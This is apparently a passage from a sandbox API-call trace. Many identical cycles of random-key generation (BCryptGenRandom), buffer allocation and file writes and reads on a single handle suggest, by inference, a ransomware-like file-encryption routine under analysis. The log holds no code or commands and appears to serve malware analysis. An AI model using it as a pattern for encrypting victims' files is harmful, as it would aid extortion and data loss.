[0105.699] free (_Block=0x1fa4848) [0105.699] free (_Block=0x2071818) [0105.699] free (_Block=0x77d908) [0105.699] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0105.700] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0105.779] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5f00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0105.779] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0105.780] CloseHandle (hObject=0x81c) returned 1 [0105.781] free (_Block=0x1ff1e60) [0105.781] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.268] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.270] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0106.275] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.278] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0106.286] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.286] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.286] free (_Block=0x77d800) [0106.286] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.286] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.286] free (_Block=0x1fa4848) [0106.287] free (_Block=0x2071818) [0106.287] free (_Block=0x77d908) [0106.287] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.287] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.294] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x60d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.294] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.295] CloseHandle (hObject=0x81c) returned 1 [0106.295] free (_Block=0x1ff1e60) [0106.295] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.304] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.304] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0106.304] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.305] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0106.305] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.305] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.305] free (_Block=0x77d800) [0106.305] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.305] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.306] free (_Block=0x1fa4848) [0106.306] free (_Block=0x2071818) [0106.306] free (_Block=0x77d908) [0106.306] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.306] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.308] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xbb80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.308] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.320] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x9d0e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.321] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.333] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xbaaa, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.334] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.334] CloseHandle (hObject=0x81c) returned 1 [0106.336] free (_Block=0x1ff1e60) [0106.336] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.344] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.345] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0106.345] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.345] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0106.346] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.346] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.346] free (_Block=0x77d800) [0106.346] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.346] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.346] free (_Block=0x1fa4848) [0106.346] free (_Block=0x2071818) [0106.346] free (_Block=0x77d908) [0106.346] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.347] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.348] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x38d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.348] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.364] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x504a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.367] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.378] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1f1e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.379] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.379] CloseHandle (hObject=0x81c) returned 1 [0106.381] free (_Block=0x1ff1e60) [0106.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.388] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.388] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0106.388] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.388] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0106.389] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.389] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.389] free (_Block=0x77d800) [0106.389] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.389] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.389] free (_Block=0x1fa4848) [0106.389] free (_Block=0x2071818) [0106.389] free (_Block=0x77d908) [0106.389] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.389] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.390] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x34d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.390] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.404] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4edd, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.405] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.415] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4fe6, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.416] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.416] CloseHandle (hObject=0x81c) returned 1 [0106.419] free (_Block=0x1ff1e60) [0106.419] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.428] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.429] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0106.429] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.430] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0106.430] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.430] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.430] free (_Block=0x77d800) [0106.430] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.430] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.431] free (_Block=0x1fa4848) [0106.431] free (_Block=0x2071818) [0106.431] free (_Block=0x77d908) [0106.431] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.431] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.432] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.432] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.442] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x32b6, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.442] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.443] CloseHandle (hObject=0x81c) returned 1 [0106.448] free (_Block=0x1ff1e60) [0106.448] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.456] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.456] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0106.457] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.457] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0106.457] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.457] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.457] free (_Block=0x77d800) [0106.457] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.457] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.457] free (_Block=0x1fa4848) [0106.458] free (_Block=0x2071818) [0106.458] free (_Block=0x77d908) [0106.458] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.458] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.459] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x25f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.459] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.460] CloseHandle (hObject=0x81c) returned 1 [0106.460] free (_Block=0x1ff1e60) [0106.460] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.467] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.467] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0106.467] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.468] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0106.468] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.468] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.468] free (_Block=0x77d800) [0106.468] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.468] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.468] free (_Block=0x1fa4848) [0106.468] free (_Block=0x2071818) [0106.468] free (_Block=0x77d908) [0106.468] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.469] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.470] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2250, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.470] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.470] CloseHandle (hObject=0x81c) returned 1 [0106.471] free (_Block=0x1ff1e60) [0106.471] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.477] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.478] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.478] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0106.478] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.478] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.478] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0106.478] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.478] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.478] free (_Block=0x77d800) [0106.478] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.478] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.479] free (_Block=0x1fa4848) [0106.479] free (_Block=0x2071818) [0106.479] free (_Block=0x77d908) [0106.479] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.479] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.480] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x38a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.480] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.481] CloseHandle (hObject=0x81c) returned 1 [0106.481] free (_Block=0x1ff1e60) [0106.481] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0106.488] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.488] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0106.488] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.489] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 